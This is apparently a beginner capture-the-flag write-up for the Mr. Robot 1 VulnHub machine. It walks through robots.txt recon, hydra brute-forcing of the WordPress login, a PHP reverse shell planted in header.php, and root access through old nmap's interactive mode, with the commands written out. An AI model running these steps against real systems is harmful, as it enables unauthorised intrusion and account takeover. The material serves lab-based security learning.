This is my writeup for the Mr. Robot 1 VM from vulnhub.com. Based on the show, Mr. Robot. This VM has three keys hidden in different locations. The goal is to find all three. Each key is progressively difficult to find.
The VM isn't too difficult. There isn't any advanced exploitation or reverse engineering. The level is considered beginner-intermediate.
When we access the IP of the VM on port 80, we see kind of a website.
The goal is to find the three hidden keys, so let's start scanning:
I run my own recon script, which contains nmap and nikto:
Nikto found the robots.txt
$ curl http://__IP__/robots.txt
Content of robots.txt: User-agent: * fsocity.dic key-1-of-3.txt
And that's the first key:
$ curl http://__IP__/key-1-of-3.txt
Further nikto found a wordpress instance and a dictionary. Using hydra we bruteforce user and password.
Find a matching user using fsocity.dic
hydra -vV -L fsocity.dic -p password __IP__ http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'
Find a matching password using fsocity.dic
hydra -vV -l elliot -P fsoprcity.dic __IP__ http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=is incorrect'
With these credentials we're able to log in into the wordpress installation.
Placing a reverse shell
I logged into wordpress and put an edited version of the php rev_shell into header.php
I then started a listener on port 42 on my local machine.
nc -lvp 42
Then I kicked the reverse shell:
Let's wait for reverse shell to connect:
Connection from __IP__ 42814 received! Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux 11:29:01 up 11 min, 1 user, load average: 0.00, 0.03, 0.05 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT robot tty1 11:21 7:36 0.07s 0.01s -bash uid=1(daemon) gid=1(daemon) groups=1(daemon) /bin/sh: 0: can't access tty; job control turned off $ whoami daemon $
Fiddled around... then I found and read /home/robot/password.raw-md5
Then spawn a tty shell using python:
python -c 'import pty; pty.spawn("/bin/sh")'
robot@linux:~$ ls ls key-2-of-3.txt password.raw-md5 robot@linux:~$ cat key-2-of-3.txt cat key-2-of-3.txt
And that's key 2:
Now we obviously need to get root. We start by searching for binaries with the SUID bit set:
find / -perm -4000 -type f 2>/dev/null
robot@linux:/$ /usr/local/bin/nmap --version /usr/local/bin/nmap --version nmap version 3.81 ( http://www.insecure.org/nmap/ )
This looks like an old version of nmap. There's that cool feature called interactive mode.
nmap --interactive nmap> !sh
Now we're root. Let's read the final key.
I didn't know about the interactive mode of nmap.